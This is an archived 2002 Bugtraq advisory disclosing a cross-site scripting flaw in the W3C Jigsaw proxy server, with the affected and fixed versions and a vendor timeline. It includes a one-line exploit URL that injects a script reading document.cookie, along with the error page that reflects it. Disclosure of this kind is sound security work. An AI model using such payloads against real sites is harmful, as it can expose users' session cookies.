Bugtraq mailing list archives
W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability (REPOST)
From: "TAKAGI, Hiromitsu" <takagi.hiromitsu () aist go jp>
Date: Sun, 18 Aug 2002 04:10:45 +0900
W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability =========================================================== Affected: Jigsaw 2.2.0 and earlier http://www.w3.org/Jigsaw/RelNotes.html#2.2.0 Fixed: Jigsaw 2.2.1 http://www.w3.org/Jigsaw/RelNotes.html#2.2.1 Exploit: http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT> ======================================================== An HTTP error occured while getting: <p> <strong>http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT></strong><p> Details "The host name [nonexistenthost.google.com] couldn't be resolved. Details: "nonexistenthost.google.com"".<hr>Generated by <i>http://.............:8001/ ...snip... ======================================================== Similar problems have been found in Proxomitron Naoko-4 BetaFour, Microsoft ISA Server and Squid 2.4 DEVEL4. <http://www.securityfocus.com/bid/3087> <http://www.microsoft.com/technet/security/bulletin/MS01-045.asp> <http://www.securityfocus.com/archive/1/197606> Vendor Status: Aug 10, 2001: Notified Jan 4, 2002: Responded Apr 8, 2002: Fix released Best regards, -- Hiromitsu Takagi http://staff.aist.go.jp/takagi.hiromitsu/
Current thread:
- W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability (REPOST) TAKAGI, Hiromitsu (Aug 19)